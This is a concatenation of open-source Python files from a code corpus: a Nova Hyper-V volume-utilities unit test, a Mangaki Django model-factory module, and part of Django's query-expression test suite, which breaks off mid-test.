nova/tests/unit/virt/hyperv/test_basevolumeutils.py
|
67
|
7839
|
# Copyright 2014 Cloudbase Solutions Srl
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from nova import test
from nova.virt.hyperv import basevolumeutils
def _exception_thrower():
raise Exception("Testing exception handling.")
class BaseVolumeUtilsTestCase(test.NoDBTestCase):
"""Unit tests for the Hyper-V BaseVolumeUtils class."""
_FAKE_COMPUTER_NAME = "fake_computer_name"
_FAKE_DOMAIN_NAME = "fake_domain_name"
_FAKE_INITIATOR_NAME = "fake_initiator_name"
_FAKE_INITIATOR_IQN_NAME = "iqn.1991-05.com.microsoft:fake_computer_name"
_FAKE_DISK_PATH = 'fake_path DeviceID="123\\\\2"'
_FAKE_MOUNT_DEVICE = '/dev/fake/mount'
_FAKE_DEVICE_NAME = '/dev/fake/path'
_FAKE_SWAP = {'device_name': _FAKE_DISK_PATH}
def setUp(self):
self._volutils = basevolumeutils.BaseVolumeUtils()
self._volutils._conn_wmi = mock.MagicMock()
self._volutils._conn_cimv2 = mock.MagicMock()
super(BaseVolumeUtilsTestCase, self).setUp()
def test_get_iscsi_initiator_ok(self):
self._check_get_iscsi_initiator(
mock.MagicMock(return_value=mock.sentinel.FAKE_KEY),
self._FAKE_INITIATOR_NAME)
def test_get_iscsi_initiator_exception(self):
initiator_name = "%(iqn)s.%(domain)s" % {
'iqn': self._FAKE_INITIATOR_IQN_NAME,
'domain': self._FAKE_DOMAIN_NAME
}
self._check_get_iscsi_initiator(_exception_thrower, initiator_name)
def _check_get_iscsi_initiator(self, winreg_method, expected):
mock_computer = mock.MagicMock()
mock_computer.name = self._FAKE_COMPUTER_NAME
mock_computer.Domain = self._FAKE_DOMAIN_NAME
self._volutils._conn_cimv2.Win32_ComputerSystem.return_value = [
mock_computer]
with mock.patch.object(basevolumeutils,
'_winreg', create=True) as mock_winreg:
mock_winreg.OpenKey = winreg_method
mock_winreg.QueryValueEx = mock.MagicMock(return_value=[expected])
initiator_name = self._volutils.get_iscsi_initiator()
self.assertEqual(expected, initiator_name)
@mock.patch.object(basevolumeutils, 'driver')
def test_volume_in_mapping(self, mock_driver):
mock_driver.block_device_info_get_mapping.return_value = [
{'mount_device': self._FAKE_MOUNT_DEVICE}]
mock_driver.block_device_info_get_swap = mock.MagicMock(
return_value=self._FAKE_SWAP)
mock_driver.block_device_info_get_ephemerals = mock.MagicMock(
return_value=[{'device_name': self._FAKE_DEVICE_NAME}])
mock_driver.swap_is_usable = mock.MagicMock(return_value=True)
self.assertTrue(self._volutils.volume_in_mapping(
self._FAKE_MOUNT_DEVICE, mock.sentinel.FAKE_BLOCK_DEVICE_INFO))
def test_get_drive_number_from_disk_path(self):
fake_disk_path = (
'\\\\WIN-I5BTVHOIFGK\\root\\virtualization\\v2:Msvm_DiskDrive.'
'CreationClassName="Msvm_DiskDrive",DeviceID="Microsoft:353B3BE8-'
'310C-4cf4-839E-4E1B14616136\\\\1",SystemCreationClassName='
'"Msvm_ComputerSystem",SystemName="WIN-I5BTVHOIFGK"')
expected_disk_number = 1
ret_val = self._volutils._get_drive_number_from_disk_path(
fake_disk_path)
self.assertEqual(expected_disk_number, ret_val)
def test_get_drive_number_not_found(self):
fake_disk_path = 'fake_disk_path'
ret_val = self._volutils._get_drive_number_from_disk_path(
fake_disk_path)
self.assertFalse(ret_val)
@mock.patch.object(basevolumeutils.BaseVolumeUtils,
"_get_drive_number_from_disk_path")
def test_get_session_id_from_mounted_disk(self, mock_get_session_id):
mock_get_session_id.return_value = mock.sentinel.FAKE_DEVICE_NUMBER
mock_initiator_session = self._create_initiator_session()
mock_ses_class = self._volutils._conn_wmi.MSiSCSIInitiator_SessionClass
mock_ses_class.return_value = [mock_initiator_session]
session_id = self._volutils.get_session_id_from_mounted_disk(
self._FAKE_DISK_PATH)
self.assertEqual(mock.sentinel.FAKE_SESSION_ID, session_id)
def test_get_devices_for_target(self):
init_session = self._create_initiator_session()
mock_ses_class = self._volutils._conn_wmi.MSiSCSIInitiator_SessionClass
mock_ses_class.return_value = [init_session]
devices = self._volutils._get_devices_for_target(
mock.sentinel.FAKE_IQN)
self.assertEqual(init_session.Devices, devices)
def test_get_devices_for_target_not_found(self):
mock_ses_class = self._volutils._conn_wmi.MSiSCSIInitiator_SessionClass
mock_ses_class.return_value = []
devices = self._volutils._get_devices_for_target(
mock.sentinel.FAKE_IQN)
self.assertEqual(0, len(devices))
@mock.patch.object(basevolumeutils.BaseVolumeUtils,
'_get_devices_for_target')
def test_get_device_number_for_target(self, fake_get_devices):
init_session = self._create_initiator_session()
fake_get_devices.return_value = init_session.Devices
mock_ses_class = self._volutils._conn_wmi.MSiSCSIInitiator_SessionClass
mock_ses_class.return_value = [init_session]
device_number = self._volutils.get_device_number_for_target(
mock.sentinel.FAKE_IQN, mock.sentinel.FAKE_LUN)
self.assertEqual(mock.sentinel.FAKE_DEVICE_NUMBER, device_number)
@mock.patch.object(basevolumeutils.BaseVolumeUtils,
'_get_devices_for_target')
def test_get_target_lun_count(self, fake_get_devices):
init_session = self._create_initiator_session()
# Only disk devices are being counted.
disk_device = mock.Mock(DeviceType=self._volutils._FILE_DEVICE_DISK)
init_session.Devices.append(disk_device)
fake_get_devices.return_value = init_session.Devices
lun_count = self._volutils.get_target_lun_count(
mock.sentinel.FAKE_IQN)
self.assertEqual(1, lun_count)
@mock.patch.object(basevolumeutils.BaseVolumeUtils,
"_get_drive_number_from_disk_path")
def test_get_target_from_disk_path(self, mock_get_session_id):
mock_get_session_id.return_value = mock.sentinel.FAKE_DEVICE_NUMBER
init_sess = self._create_initiator_session()
mock_ses_class = self._volutils._conn_wmi.MSiSCSIInitiator_SessionClass
mock_ses_class.return_value = [init_sess]
(target_name, scsi_lun) = self._volutils.get_target_from_disk_path(
self._FAKE_DISK_PATH)
self.assertEqual(mock.sentinel.FAKE_TARGET_NAME, target_name)
self.assertEqual(mock.sentinel.FAKE_LUN, scsi_lun)
def _create_initiator_session(self):
device = mock.MagicMock()
device.ScsiLun = mock.sentinel.FAKE_LUN
device.DeviceNumber = mock.sentinel.FAKE_DEVICE_NUMBER
device.TargetName = mock.sentinel.FAKE_TARGET_NAME
init_session = mock.MagicMock()
init_session.Devices = [device]
init_session.SessionId = mock.sentinel.FAKE_SESSION_ID
return init_session
|
apache-2.0
|
mangaki/mangaki
|
mangaki/mangaki/factories.py
|
1
|
1591
|
import factory
from factory.django import DjangoModelFactory, mute_signals
from .models import Profile, Work, Category
from django.contrib.auth.models import User
from django.db.models.signals import post_save
class ProfileFactory(DjangoModelFactory):
class Meta:
model = Profile
user = factory.SubFactory('mangaki.factories.UserFactory', profile=None)
mal_username = factory.Faker('user_name')
is_shared = factory.Faker('boolean')
nsfw_ok = factory.Faker('boolean')
newsletter_ok = factory.Faker('boolean')
avatar_url = factory.LazyAttribute(lambda o: '{}{}.png'.format(factory.Faker('url').generate({}), o.mal_username))
@mute_signals(post_save)
class UserFactory(DjangoModelFactory):
class Meta:
model = User
username = factory.Faker('user_name')
email = factory.LazyAttribute(lambda o: '{}@mangaki.fr'.format(o.username))
profile = factory.RelatedFactory(ProfileFactory, 'user')
class WorkFactory(DjangoModelFactory):
class Meta:
model = Work
category = factory.Iterator(Category.objects.all())
@factory.iterator
def title():
qs = Work.objects.values_list('title', flat=True).all()[:20]
for title in qs:
yield title
nsfw = factory.Faker('boolean')
synopsis = factory.Faker('text')
def create_user(**kwargs):
return UserFactory.create(**kwargs)
def create_user_with_profile(**kwargs):
profile = kwargs.pop('profile')
user = create_user(**kwargs)
for key, value in profile.items():
setattr(user.profile, key, value)
return user
|
agpl-3.0
|
Vixionar/django
|
tests/expressions/tests.py
|
171
|
36421
|
from __future__ import unicode_literals
import datetime
import uuid
from copy import deepcopy
from django.core.exceptions import FieldError
from django.db import DatabaseError, connection, models, transaction
from django.db.models import TimeField, UUIDField
from django.db.models.aggregates import (
Avg, Count, Max, Min, StdDev, Sum, Variance,
)
from django.db.models.expressions import (
F, Case, Col, Date, DateTime, ExpressionWrapper, Func, OrderBy, Random,
RawSQL, Ref, Value, When,
)
from django.db.models.functions import (
Coalesce, Concat, Length, Lower, Substr, Upper,
)
from django.test import TestCase, skipIfDBFeature, skipUnlessDBFeature
from django.test.utils import Approximate
from django.utils import six
from django.utils.timezone import utc
from .models import UUID, Company, Employee, Experiment, Number, Time
class BasicExpressionsTests(TestCase):
@classmethod
def setUpTestData(cls):
Company.objects.create(
name="Example Inc.", num_employees=2300, num_chairs=5,
ceo=Employee.objects.create(firstname="Joe", lastname="Smith", salary=10)
)
Company.objects.create(
name="Foobar Ltd.", num_employees=3, num_chairs=4,
ceo=Employee.objects.create(firstname="Frank", lastname="Meyer", salary=20)
)
Company.objects.create(
name="Test GmbH", num_employees=32, num_chairs=1,
ceo=Employee.objects.create(firstname="Max", lastname="Mustermann", salary=30)
)
def setUp(self):
self.company_query = Company.objects.values(
"name", "num_employees", "num_chairs"
).order_by(
"name", "num_employees", "num_chairs"
)
def test_annotate_values_aggregate(self):
companies = Company.objects.annotate(
salaries=F('ceo__salary'),
).values('num_employees', 'salaries').aggregate(
result=Sum(F('salaries') + F('num_employees'),
output_field=models.IntegerField()),
)
self.assertEqual(companies['result'], 2395)
def test_filter_inter_attribute(self):
# We can filter on attribute relationships on same model obj, e.g.
# find companies where the number of employees is greater
# than the number of chairs.
self.assertQuerysetEqual(
self.company_query.filter(num_employees__gt=F("num_chairs")), [
{
"num_chairs": 5,
"name": "Example Inc.",
"num_employees": 2300,
},
{
"num_chairs": 1,
"name": "Test GmbH",
"num_employees": 32
},
],
lambda o: o
)
def test_update(self):
# We can set one field to have the value of another field
# Make sure we have enough chairs
self.company_query.update(num_chairs=F("num_employees"))
self.assertQuerysetEqual(
self.company_query, [
{
"num_chairs": 2300,
"name": "Example Inc.",
"num_employees": 2300
},
{
"num_chairs": 3,
"name": "Foobar Ltd.",
"num_employees": 3
},
{
"num_chairs": 32,
"name": "Test GmbH",
"num_employees": 32
}
],
lambda o: o
)
def test_arithmetic(self):
# We can perform arithmetic operations in expressions
# Make sure we have 2 spare chairs
self.company_query.update(num_chairs=F("num_employees") + 2)
self.assertQuerysetEqual(
self.company_query, [
{
'num_chairs': 2302,
'name': 'Example Inc.',
'num_employees': 2300
},
{
'num_chairs': 5,
'name': 'Foobar Ltd.',
'num_employees': 3
},
{
'num_chairs': 34,
'name': 'Test GmbH',
'num_employees': 32
}
],
lambda o: o,
)
def test_order_of_operations(self):
# Law of order of operations is followed
self. company_query.update(
num_chairs=F('num_employees') + 2 * F('num_employees')
)
self.assertQuerysetEqual(
self.company_query, [
{
'num_chairs': 6900,
'name': 'Example Inc.',
'num_employees': 2300
},
{
'num_chairs': 9,
'name': 'Foobar Ltd.',
'num_employees': 3
},
{
'num_chairs': 96,
'name': 'Test GmbH',
'num_employees': 32
}
],
lambda o: o,
)
def test_parenthesis_priority(self):
# Law of order of operations can be overridden by parentheses
self.company_query.update(
num_chairs=((F('num_employees') + 2) * F('num_employees'))
)
self.assertQuerysetEqual(
self.company_query, [
{
'num_chairs': 5294600,
'name': 'Example Inc.',
'num_employees': 2300
},
{
'num_chairs': 15,
'name': 'Foobar Ltd.',
'num_employees': 3
},
{
'num_chairs': 1088,
'name': 'Test GmbH',
'num_employees': 32
}
],
lambda o: o,
)
def test_update_with_fk(self):
# ForeignKey can become updated with the value of another ForeignKey.
self.assertEqual(
Company.objects.update(point_of_contact=F('ceo')),
3
)
self.assertQuerysetEqual(
Company.objects.all(), [
"Joe Smith",
"Frank Meyer",
"Max Mustermann",
],
lambda c: six.text_type(c.point_of_contact),
ordered=False
)
def test_update_with_none(self):
Number.objects.create(integer=1, float=1.0)
Number.objects.create(integer=2)
Number.objects.filter(float__isnull=False).update(float=Value(None))
self.assertQuerysetEqual(
Number.objects.all(), [
None,
None,
],
lambda n: n.float,
ordered=False
)
def test_filter_with_join(self):
# F Expressions can also span joins
Company.objects.update(point_of_contact=F('ceo'))
c = Company.objects.all()[0]
c.point_of_contact = Employee.objects.create(firstname="Guido", lastname="van Rossum")
c.save()
self.assertQuerysetEqual(
Company.objects.filter(ceo__firstname=F("point_of_contact__firstname")), [
"Foobar Ltd.",
"Test GmbH",
],
lambda c: c.name,
ordered=False
)
Company.objects.exclude(
ceo__firstname=F("point_of_contact__firstname")
).update(name="foo")
self.assertEqual(
Company.objects.exclude(
ceo__firstname=F('point_of_contact__firstname')
).get().name,
"foo",
)
with transaction.atomic():
with self.assertRaises(FieldError):
Company.objects.exclude(
ceo__firstname=F('point_of_contact__firstname')
).update(name=F('point_of_contact__lastname'))
def test_object_update(self):
# F expressions can be used to update attributes on single objects
test_gmbh = Company.objects.get(name="Test GmbH")
self.assertEqual(test_gmbh.num_employees, 32)
test_gmbh.num_employees = F("num_employees") + 4
test_gmbh.save()
test_gmbh = Company.objects.get(pk=test_gmbh.pk)
self.assertEqual(test_gmbh.num_employees, 36)
def test_object_update_fk(self):
# F expressions cannot be used to update attributes which are foreign
# keys, or attributes which involve joins.
test_gmbh = Company.objects.get(name="Test GmbH")
def test():
test_gmbh.point_of_contact = F("ceo")
self.assertRaises(ValueError, test)
test_gmbh.point_of_contact = test_gmbh.ceo
test_gmbh.save()
test_gmbh.name = F("ceo__last_name")
self.assertRaises(FieldError, test_gmbh.save)
def test_object_update_unsaved_objects(self):
# F expressions cannot be used to update attributes on objects which do
# not yet exist in the database
test_gmbh = Company.objects.get(name="Test GmbH")
acme = Company(
name="The Acme Widget Co.", num_employees=12, num_chairs=5,
ceo=test_gmbh.ceo
)
acme.num_employees = F("num_employees") + 16
self.assertRaises(TypeError, acme.save)
def test_ticket_11722_iexact_lookup(self):
Employee.objects.create(firstname="John", lastname="Doe")
Employee.objects.create(firstname="Test", lastname="test")
queryset = Employee.objects.filter(firstname__iexact=F('lastname'))
self.assertQuerysetEqual(queryset, ["<Employee: Test test>"])
@skipIfDBFeature('has_case_insensitive_like')
def test_ticket_16731_startswith_lookup(self):
Employee.objects.create(firstname="John", lastname="Doe")
e2 = Employee.objects.create(firstname="Jack", lastname="Jackson")
e3 = Employee.objects.create(firstname="Jack", lastname="jackson")
self.assertQuerysetEqual(
Employee.objects.filter(lastname__startswith=F('firstname')),
[e2], lambda x: x)
self.assertQuerysetEqual(
Employee.objects.filter(lastname__istartswith=F('firstname')).order_by('pk'),
[e2, e3], lambda x: x)
def test_ticket_18375_join_reuse(self):
# Test that reverse multijoin F() references and the lookup target
# the same join. Pre #18375 the F() join was generated first, and the
# lookup couldn't reuse that join.
qs = Employee.objects.filter(
company_ceo_set__num_chairs=F('company_ceo_set__num_employees'))
self.assertEqual(str(qs.query).count('JOIN'), 1)
def test_ticket_18375_kwarg_ordering(self):
# The next query was dict-randomization dependent - if the "gte=1"
# was seen first, then the F() will reuse the join generated by the
# gte lookup, if F() was seen first, then it generated a join the
# other lookups could not reuse.
qs = Employee.objects.filter(
company_ceo_set__num_chairs=F('company_ceo_set__num_employees'),
company_ceo_set__num_chairs__gte=1)
self.assertEqual(str(qs.query).count('JOIN'), 1)
def test_ticket_18375_kwarg_ordering_2(self):
# Another similar case for F() than above. Now we have the same join
# in two filter kwargs, one in the lhs lookup, one in F. Here pre
# #18375 the amount of joins generated was random if dict
# randomization was enabled, that is the generated query dependent
# on which clause was seen first.
qs = Employee.objects.filter(
company_ceo_set__num_employees=F('pk'),
pk=F('company_ceo_set__num_employees')
)
self.assertEqual(str(qs.query).count('JOIN'), 1)
def test_ticket_18375_chained_filters(self):
# Test that F() expressions do not reuse joins from previous filter.
qs = Employee.objects.filter(
company_ceo_set__num_employees=F('pk')
).filter(
company_ceo_set__num_employees=F('company_ceo_set__num_employees')
)
self.assertEqual(str(qs.query).count('JOIN'), 2)
class ExpressionsTests(TestCase):
def test_F_object_deepcopy(self):
"""
Make sure F objects can be deepcopied (#23492)
"""
f = F("foo")
g = deepcopy(f)
self.assertEqual(f.name, g.name)
def test_f_reuse(self):
f = F('id')
n = Number.objects.create(integer=-1)
c = Company.objects.create(
name="Example Inc.", num_employees=2300, num_chairs=5,
ceo=Employee.objects.create(firstname="Joe", lastname="Smith")
)
c_qs = Company.objects.filter(id=f)
self.assertEqual(c_qs.get(), c)
# Reuse the same F-object for another queryset
n_qs = Number.objects.filter(id=f)
self.assertEqual(n_qs.get(), n)
# The original query still works correctly
self.assertEqual(c_qs.get(), c)
def test_patterns_escape(self):
"""
Test that special characters (e.g. %, _ and \) stored in database are
properly escaped when using a pattern lookup with an expression
refs #16731
"""
Employee.objects.bulk_create([
Employee(firstname="%Joh\\nny", lastname="%Joh\\n"),
Employee(firstname="Johnny", lastname="%John"),
Employee(firstname="Jean-Claude", lastname="Claud_"),
Employee(firstname="Jean-Claude", lastname="Claude"),
Employee(firstname="Jean-Claude", lastname="Claude%"),
Employee(firstname="Johnny", lastname="Joh\\n"),
Employee(firstname="Johnny", lastname="John"),
Employee(firstname="Johnny", lastname="_ohn"),
])
self.assertQuerysetEqual(
Employee.objects.filter(firstname__contains=F('lastname')),
["<Employee: %Joh\\nny %Joh\\n>", "<Employee: Jean-Claude Claude>", "<Employee: Johnny John>"],
ordered=False)
self.assertQuerysetEqual(
Employee.objects.filter(firstname__startswith=F('lastname')),
["<Employee: %Joh\\nny %Joh\\n>", "<Employee: Johnny John>"],
ordered=False)
self.assertQuerysetEqual(
Employee.objects.filter(firstname__endswith=F('lastname')),
["<Employee: Jean-Claude Claude>"],
ordered=False)
def test_insensitive_patterns_escape(self):
"""
Test that special characters (e.g. %, _ and \) stored in database are
properly escaped when using a case insensitive pattern lookup with an
expression -- refs #16731
"""
Employee.objects.bulk_create([
Employee(firstname="%Joh\\nny", lastname="%joh\\n"),
Employee(firstname="Johnny", lastname="%john"),
Employee(firstname="Jean-Claude", lastname="claud_"),
Employee(firstname="Jean-Claude", lastname="claude"),
Employee(firstname="Jean-Claude", lastname="claude%"),
Employee(firstname="Johnny", lastname="joh\\n"),
Employee(firstname="Johnny", lastname="john"),
Employee(firstname="Johnny", lastname="_ohn"),
])
self.assertQuerysetEqual(
Employee.objects.filter(firstname__icontains=F('lastname')),
["<Employee: %Joh\\nny %joh\\n>", "<Employee: Jean-Claude claude>", "<Employee: Johnny john>"],
ordered=False)
self.assertQuerysetEqual(
Employee.objects.filter(firstname__istartswith=F('lastname')),
["<Employee: %Joh\\nny %joh\\n>", "<Employee: Johnny john>"],
ordered=False)
self.assertQuerysetEqual(
Employee.objects.filter(firstname__iendswith=F('lastname')),
["<Employee: Jean-Claude claude>"],
ordered=False)
class ExpressionsNumericTests(TestCase):
def setUp(self):
Number(integer=-1).save()
Number(integer=42).save()
Number(integer=1337).save()
self.assertEqual(Number.objects.update(float=F('integer')), 3)
def test_fill_with_value_from_same_object(self):
"""
We can fill a value in all objects with an other value of the
same object.
"""
self.assertQuerysetEqual(
Number.objects.all(),
[
'<Number: -1, -1.000>',
'<Number: 42, 42.000>',
'<Number: 1337, 1337.000>'
],
ordered=False
)
def test_increment_value(self):
"""
We can increment a value of all objects in a query set.
"""
self.assertEqual(
Number.objects.filter(integer__gt=0)
.update(integer=F('integer') + 1),
2)
self.assertQuerysetEqual(
Number.objects.all(),
[
'<Number: -1, -1.000>',
'<Number: 43, 42.000>',
'<Number: 1338, 1337.000>'
],
ordered=False
)
def test_filter_not_equals_other_field(self):
"""
We can filter for objects, where a value is not equals the value
of an other field.
"""
self.assertEqual(
Number.objects.filter(integer__gt=0)
.update(integer=F('integer') + 1),
2)
self.assertQuerysetEqual(
Number.objects.exclude(float=F('integer')),
[
'<Number: 43, 42.000>',
'<Number: 1338, 1337.000>'
],
ordered=False
)
def test_complex_expressions(self):
"""
Complex expressions of different connection types are possible.
"""
n = Number.objects.create(integer=10, float=123.45)
self.assertEqual(Number.objects.filter(pk=n.pk).update(
float=F('integer') + F('float') * 2), 1)
self.assertEqual(Number.objects.get(pk=n.pk).integer, 10)
self.assertEqual(Number.objects.get(pk=n.pk).float, Approximate(256.900, places=3))
def test_incorrect_field_expression(self):
with six.assertRaisesRegex(self, FieldError, "Cannot resolve keyword u?'nope' into field.*"):
list(Employee.objects.filter(firstname=F('nope')))
class ExpressionOperatorTests(TestCase):
def setUp(self):
self.n = Number.objects.create(integer=42, float=15.5)
def test_lefthand_addition(self):
# LH Addition of floats and integers
Number.objects.filter(pk=self.n.pk).update(
integer=F('integer') + 15,
float=F('float') + 42.7
)
self.assertEqual(Number.objects.get(pk=self.n.pk).integer, 57)
self.assertEqual(Number.objects.get(pk=self.n.pk).float, Approximate(58.200, places=3))
def test_lefthand_subtraction(self):
# LH Subtraction of floats and integers
Number.objects.filter(pk=self.n.pk).update(integer=F('integer') - 15,
float=F('float') - 42.7)
self.assertEqual(Number.objects.get(pk=self.n.pk).integer, 27)
self.assertEqual(Number.objects.get(pk=self.n.pk).float, Approximate(-27.200, places=3))
def test_lefthand_multiplication(self):
# Multiplication of floats and integers
Number.objects.filter(pk=self.n.pk).update(integer=F('integer') * 15,
float=F('float') * 42.7)
self.assertEqual(Number.objects.get(pk=self.n.pk).integer, 630)
self.assertEqual(Number.objects.get(pk=self.n.pk).float, Approximate(661.850, places=3))
def test_lefthand_division(self):
# LH Division of floats and integers
Number.objects.filter(pk=self.n.pk).update(integer=F('integer') / 2,
float=F('float') / 42.7)
self.assertEqual(Number.objects.get(pk=self.n.pk).integer, 21)
self.assertEqual(Number.objects.get(pk=self.n.pk).float, Approximate(0.363, places=3))
def test_lefthand_modulo(self):
# LH Modulo arithmetic on integers
Number.objects.filter(pk=self.n.pk).update(integer=F('integer') % 20)
self.assertEqual(Number.objects.get(pk=self.n.pk).integer, 2)
self.assertEqual(Number.objects.get(pk=self.n.pk).float, Approximate(15.500, places=3))
def test_lefthand_bitwise_and(self):
# LH Bitwise ands on integers
Number.objects.filter(pk=self.n.pk).update(integer=F('integer').bitand(56))
self.assertEqual(Number.objects.get(pk=self.n.pk).integer, 40)
self.assertEqual(Number.objects.get(pk=self.n.pk).float, Approximate(15.500, places=3))
@skipUnlessDBFeature('supports_bitwise_or')
def test_lefthand_bitwise_or(self):
# LH Bitwise or on integers
Number.objects.filter(pk=self.n.pk).update(integer=F('integer').bitor(48))
self.assertEqual(Number.objects.get(pk=self.n.pk).integer, 58)
self.assertEqual(Number.objects.get(pk=self.n.pk).float, Approximate(15.500, places=3))
def test_lefthand_power(self):
# LH Powert arithmetic operation on floats and integers
Number.objects.filter(pk=self.n.pk).update(integer=F('integer') ** 2,
float=F('float') ** 1.5)
self.assertEqual(Number.objects.get(pk=self.n.pk).integer, 1764)
self.assertEqual(Number.objects.get(pk=self.n.pk).float, Approximate(61.02, places=2))
def test_right_hand_addition(self):
# Right hand operators
Number.objects.filter(pk=self.n.pk).update(integer=15 + F('integer'),
float=42.7 + F('float'))
# RH Addition of floats and integers
self.assertEqual(Number.objects.get(pk=self.n.pk).integer, 57)
self.assertEqual(Number.objects.get(pk=self.n.pk).float, Approximate(58.200, places=3))
def test_right_hand_subtraction(self):
Number.objects.filter(pk=self.n.pk).update(integer=15 - F('integer'),
float=42.7 - F('float'))
# RH Subtraction of floats and integers
self.assertEqual(Number.objects.get(pk=self.n.pk).integer, -27)
self.assertEqual(Number.objects.get(pk=self.n.pk).float, Approximate(27.200, places=3))
def test_right_hand_multiplication(self):
# RH Multiplication of floats and integers
Number.objects.filter(pk=self.n.pk).update(integer=15 * F('integer'),
float=42.7 * F('float'))
self.assertEqual(Number.objects.get(pk=self.n.pk).integer, 630)
self.assertEqual(Number.objects.get(pk=self.n.pk).float, Approximate(661.850, places=3))
def test_right_hand_division(self):
# RH Division of floats and integers
Number.objects.filter(pk=self.n.pk).update(integer=640 / F('integer'),
float=42.7 / F('float'))
self.assertEqual(Number.objects.get(pk=self.n.pk).integer, 15)
self.assertEqual(Number.objects.get(pk=self.n.pk).float, Approximate(2.755, places=3))
def test_right_hand_modulo(self):
# RH Modulo arithmetic on integers
Number.objects.filter(pk=self.n.pk).update(integer=69 % F('integer'))
self.assertEqual(Number.objects.get(pk=self.n.pk).integer, 27)
self.assertEqual(Number.objects.get(pk=self.n.pk).float, Approximate(15.500, places=3))
def test_righthand_power(self):
# RH Powert arithmetic operation on floats and integers
Number.objects.filter(pk=self.n.pk).update(integer=2 ** F('integer'),
float=1.5 ** F('float'))
self.assertEqual(Number.objects.get(pk=self.n.pk).integer, 4398046511104)
self.assertEqual(Number.objects.get(pk=self.n.pk).float, Approximate(536.308, places=3))
class FTimeDeltaTests(TestCase):
def setUp(self):
self.sday = sday = datetime.date(2010, 6, 25)
self.stime = stime = datetime.datetime(2010, 6, 25, 12, 15, 30, 747000)
midnight = datetime.time(0)
delta0 = datetime.timedelta(0)
delta1 = datetime.timedelta(microseconds=253000)
delta2 = datetime.timedelta(seconds=44)
delta3 = datetime.timedelta(hours=21, minutes=8)
delta4 = datetime.timedelta(days=10)
# Test data is set so that deltas and delays will be
# strictly increasing.
self.deltas = []
self.delays = []
self.days_long = []
# e0: started same day as assigned, zero duration
end = stime + delta0
e0 = Experiment.objects.create(name='e0', assigned=sday, start=stime,
end=end, completed=end.date(), estimated_time=delta0)
self.deltas.append(delta0)
self.delays.append(e0.start -
datetime.datetime.combine(e0.assigned, midnight))
self.days_long.append(e0.completed - e0.assigned)
# e1: started one day after assigned, tiny duration, data
# set so that end time has no fractional seconds, which
# tests an edge case on sqlite. This Experiment is only
# included in the test data when the DB supports microsecond
# precision.
if connection.features.supports_microsecond_precision:
delay = datetime.timedelta(1)
end = stime + delay + delta1
e1 = Experiment.objects.create(name='e1', assigned=sday,
start=stime + delay, end=end, completed=end.date(), estimated_time=delta1)
self.deltas.append(delta1)
self.delays.append(e1.start -
datetime.datetime.combine(e1.assigned, midnight))
self.days_long.append(e1.completed - e1.assigned)
# e2: started three days after assigned, small duration
end = stime + delta2
e2 = Experiment.objects.create(name='e2',
assigned=sday - datetime.timedelta(3), start=stime, end=end,
completed=end.date(), estimated_time=datetime.timedelta(hours=1))
self.deltas.append(delta2)
self.delays.append(e2.start -
datetime.datetime.combine(e2.assigned, midnight))
self.days_long.append(e2.completed - e2.assigned)
# e3: started four days after assigned, medium duration
delay = datetime.timedelta(4)
end = stime + delay + delta3
e3 = Experiment.objects.create(name='e3',
assigned=sday, start=stime + delay, end=end, completed=end.date(), estimated_time=delta3)
self.deltas.append(delta3)
self.delays.append(e3.start -
datetime.datetime.combine(e3.assigned, midnight))
self.days_long.append(e3.completed - e3.assigned)
# e4: started 10 days after assignment, long duration
end = stime + delta4
e4 = Experiment.objects.create(name='e4',
assigned=sday - datetime.timedelta(10), start=stime, end=end,
completed=end.date(), estimated_time=delta4 - datetime.timedelta(1))
self.deltas.append(delta4)
self.delays.append(e4.start -
datetime.datetime.combine(e4.assigned, midnight))
self.days_long.append(e4.completed - e4.assigned)
self.expnames = [e.name for e in Experiment.objects.all()]
def test_multiple_query_compilation(self):
# Ticket #21643
queryset = Experiment.objects.filter(end__lt=F('start') + datetime.timedelta(hours=1))
q1 = str(queryset.query)
q2 = str(queryset.query)
self.assertEqual(q1, q2)
def test_query_clone(self):
# Ticket #21643 - Crash when compiling query more than once
qs = Experiment.objects.filter(end__lt=F('start') + datetime.timedelta(hours=1))
qs2 = qs.all()
list(qs)
list(qs2)
# Intentionally no assert
def test_delta_add(self):
for i in range(len(self.deltas)):
delta = self.deltas[i]
test_set = [e.name for e in
Experiment.objects.filter(end__lt=F('start') + delta)]
self.assertEqual(test_set, self.expnames[:i])
test_set = [e.name for e in
Experiment.objects.filter(end__lt=delta + F('start'))]
self.assertEqual(test_set, self.expnames[:i])
test_set = [e.name for e in
Experiment.objects.filter(end__lte=F('start') + delta)]
self.assertEqual(test_set, self.expnames[:i + 1])
def test_delta_subtract(self):
for i in range(len(self.deltas)):
delta = self.deltas[i]
test_set = [e.name for e in
Experiment.objects.filter(start__gt=F('end') - delta)]
self.assertEqual(test_set, self.expnames[:i])
test_set = [e.name for e in
Experiment.objects.filter(start__gte=F('end') - delta)]
self.assertEqual(test_set, self.expnames[:i + 1])
def test_exclude(self):
for i in range(len(self.deltas)):
delta = self.deltas[i]
test_set = [e.name for e in
Experiment.objects.exclude(end__lt=F('start') + delta)]
self.assertEqual(test_set, self.expnames[i:])
test_set = [e.name for e in
Experiment.objects.exclude(end__lte=F('start') + delta)]
self.assertEqual(test_set, self.expnames[i + 1:])
def test_date_comparison(self):
for i in range(len(self.days_long)):
days = self.days_long[i]
test_set = [e.name for e in
Experiment.objects.filter(completed__lt=F('assigned') + days)]
self.assertEqual(test_set, self.expnames[:i])
test_set = [e.name for e in
Experiment.objects.filter(completed__lte=F('assigned') + days)]
self.assertEqual(test_set, self.expnames[:i + 1])
@skipUnlessDBFeature("supports_mixed_date_datetime_comparisons")
def test_mixed_comparisons1(self):
for i in range(len(self.delays)):
delay = self.delays[i]
if not connection.features.supports_microsecond_precision:
delay = datetime.timedelta(delay.days, delay.seconds)
test_set = [e.name for e in
Experiment.objects.filter(assigned__gt=F('start') - delay)]
self.assertEqual(test_set, self.expnames[:i])
test_set = [e.name for e in
Experiment.objects.filter(assigned__gte=F('start') - delay)]
self.assertEqual(test_set, self.expnames[:i + 1])
def test_mixed_comparisons2(self):
delays = [datetime.timedelta(delay.days) for delay in self.delays]
for i in range(len(delays)):
delay = delays[i]
test_set = [e.name for e in
